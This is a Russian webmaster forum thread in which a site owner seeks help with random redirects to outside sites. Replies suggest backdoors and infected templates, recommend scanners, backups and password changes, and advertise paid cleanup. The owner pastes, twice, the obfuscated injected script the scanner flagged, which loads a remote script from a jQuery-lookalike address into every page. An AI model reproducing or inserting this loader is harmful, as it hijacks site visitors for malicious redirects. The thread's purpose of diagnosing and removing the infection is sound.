Редирект на "левые" сайты. Где искать проблему?
Страницы: 1
Редирект на "левые" сайты. Где искать проблему?
Здравствуйте, мой сайт med-brand.ru. Когда открываю главную страницу или какую-либо ссылку с главной страницы, иногда срабатывает переход на сторонние сайты (например - simsimply.com и games-iso.com). Как устранить проблему? Слышал нужно править файл  .htaccess, но что конкретно...раньше с этим не сталкивался...Спасибо за помощь.
Тут глубже копать надо! Первый вопрос, который Вы должны себе задать: кто этот файлик  .htaccess подвравил до вас, что он стал редиректить на левые сайты, и каким образом это произошло. Причин может быть много. В любом случае такой симптом весьма тревожен. Я сталкивался пару раз с таким явлением и в моём случае  это был бэк дор и шелл вирусы. Что это за гадость и как с ней бороться почитайте в инете, инфы много. Лучше, конечно, специалисту по этим вопросам показаться. Свои сайты  я сам лечил, однако тут как в трипере. Не долечишь, и всё начинается снова))).
Цитата
Вадим Бардадым пишет:
иногда срабатывает переход на сторонние сайты
Иногда - это как? При каких условиях.
Может быть вредоносный код, проверьте файлы на наличие какого-то "левого" кода.
Где отдохнуть? Куда поехать? Выбирай с нами
Цитата
Вадим Бардадым пишет:
Здравствуйте, мой сайт med-brand.ru. Когда открываю главную страницу или какую-либо ссылку с главной страницы, иногда срабатывает переход на сторонние сайты (например - simsimply.com и games-iso.com). Как устранить проблему? Слышал нужно править файл .htaccess, но что конкретно...раньше с этим не сталкивался...Спасибо за помощь.
Давай за 150р реши твои проблемы с сайтом.
Скайп art_dsugar.
Цитата
Антон пишет:
Может быть вредоносный код, проверьте файлы на наличие какого-то "левого" кода.
Действительно, вот результаты сканирования - sitecheck.sucuri.net/scanner/?scan=med-brand.ruНа этот код ругается антивирусник: 

Код
<script type="text/javascript">var hs_frf=document.createElement('script');hs_frf.setAttribute("type","text/javascript");var _0xa6df=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6A\x75\x71\x75\x65\x72\x79\x2E\x63\x6F\x6D\x2F\x63\x6F\x6D\x70\x61\x62\x69\x6C\x69\x74\x79\x2E\x70\x68\x70\x3F","\x72\x61\x6E\x64\x6F\x6D"];var hs_fln=_0xa6df[0]+Math[_0xa6df[1]]();hs_frf.setAttribute("src",hs_fln);if (typeof hs_frf!="undefined");document.getElementsByTagName("head")[0].appendChild(hs_frf);</script> <script type="text/javascript"> 
 
Пробовали удалить его с Алексей SP ( www.cy-pr.com/forum/f80/t52000/#100941 ). Не получилось, может кто подскажет как удалить или человека, который поможет.
Цитата
Coder пишет:
Иногда - это как? При каких условиях.
Условий как-таковых и нет. Переходит 1 раз за 5 кликов (примерно), в основном с главной страницы...
Цитата
Вадим Бардадым пишет:
Цитата
Антон пишет:
Может быть вредоносный код, проверьте файлы на наличие какого-то "левого" кода.
Действительно, вот результаты сканирования - sitecheck.sucuri.net/scanner/?scan=med-brand.ruНа этот код ругается антивирусник:
Код
 <script type="text/javascript">var hs_frf=document.createElement('script');hs_frf.setAttribute("type","text/javascript");var _0xa6df=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6A\x75\x71\x75\x65\x72\x79\x2E\x63\x6F\x6D\x2F\x63\x6F\x6D\x70\x61\x62\x69\x6C\x69\x74\x79\x2E\x70\x68\x70\x3F","\x72\x61\x6E\x64\x6F\x6D"];var hs_fln=_0xa6df[0]+Math[_0xa6df[1]]();hs_frf.setAttribute("src",hs_fln);if (typeof hs_frf!="undefined");document.getElementsByTagName("head")[0].appendChild(hs_frf);</script> <script type="text/javascript"> 
  
Пробовали удалить его с Алексей SP [ www.cy-pr.com/forum/f80/t52000/#100941 ]. Не получилось, может кто подскажет как удалить или человека, который поможет.
Судя по коду у Вас полный триппер-букет в шаблоне WordPress ( wordpress.org/ )! Тут посмотрите: _www.site-security.ru/opisanie-raboty-skanera.html сканером. Sheel and Basic Backdoor Script Finder - в открытом доступе всем желающим можно скачать _www.site-security.ru/nash-pervyj-skaner.html
И следом почитать: _habrahabr.ru/company/sprinthost/blog/125839/ и взять на вооружение!
А откатить сайт из резервной копии не судьба? Вам за такие Редиректы Яндекс АГС воткнет... Ооо! И пароли смените после лечения!
Посмотреть конечно любопытно - пусть даже без денег! smile:)
ТС, то что у вас обнаружено может быть причной, но не источником заразы. Внешний не всегда можно что-либо сказать, поэтому внимательнее проверьте файлы сайта.
Если сами не справитесь стучите проверим сайт на все виды вирусов + дадим рекомендации!
Цитата
mylegnica пишет:
Судя по коду у Вас полный триппер-букет в шаблоне WordPress
У меня источником трипака явился тако же шаблон, только для Joomla. Частенько, если скачать шаблончик Бог весть откуда, можно намотать якусь гидоту.smile:) Два раза после лечения у меня случались рецидивы. Чуть до инфаркта не довели. Но когда на самом шаблоне нашёл замаскированный скрипт всё прекратилось.
ФУУУХ, НАКОНЕЦ!!!! Спасибо Всем кто участвовал, долго не мог удалить вредоносный код на сайте! После длительного поиска специалиста, нашел в сети Алексея ( skype - [SIZE=2]doktorsaitov)[/SIZE], Алексей справился с задачей на все 100%, проделал большую и кропотливую работу, источником заразы оказался плагин, причем были вкрапления в functions.php + пошел на встречу в плане цены, за что я ему очень благодарен! Рекомендую всем и буду обращаться сам!!!
Да...Кому нужна помощь, на этом форуме он находится по ссылке: www.cy-pr.com/people/114017/
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
19:29 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
17:29 Как продвигать сайт с неуникальным контентом 
14:50 Индексация страниц 
12:36 У кого новостник, дайте пару советов плиз 
13:53 AviTool - мощный инструмент для автоматизации работы с Avito 
17:01 Absence в Армении 
23:19 Ребята подскажите какими сервисами и прогами вы пользуетесь для SEO продвижения? 
20:21 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 
18:30 - Вечные ссылки с трастовых сайтов 2024 проверен FastTrust 
16:09 Установка|Настройка|Доработка|Наполнение сайтов|Дизайн|3D|Видеомонтаж 
12:15 [MOBILE 4G/LTE PROXY] Приватные Мобильные Прокси 30 Дней 10$ Безлим/ Подходят для всех сайтов 
23:25 Обменник криптовалюты OnlyCrypto 
19:18 Размещение статей, ссылок и постовых на качественных ресурсах 
16:32 Продажа аккаунтов HH.RU 
22:06 Добро пожаловать в цифровой мир... 
19:42 Топ-5 способов использовать мобильные прокси для бизнеса: подробный обзор 
22:08 Накрутка поисковых подсказок 
05:04 Точные прогнозы на футбол 
14:01 Union Pharm - топовая фарма-партнерка для профессионалов! 
10:59 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
12:23 150+ хакерских поисковых систем и инструментов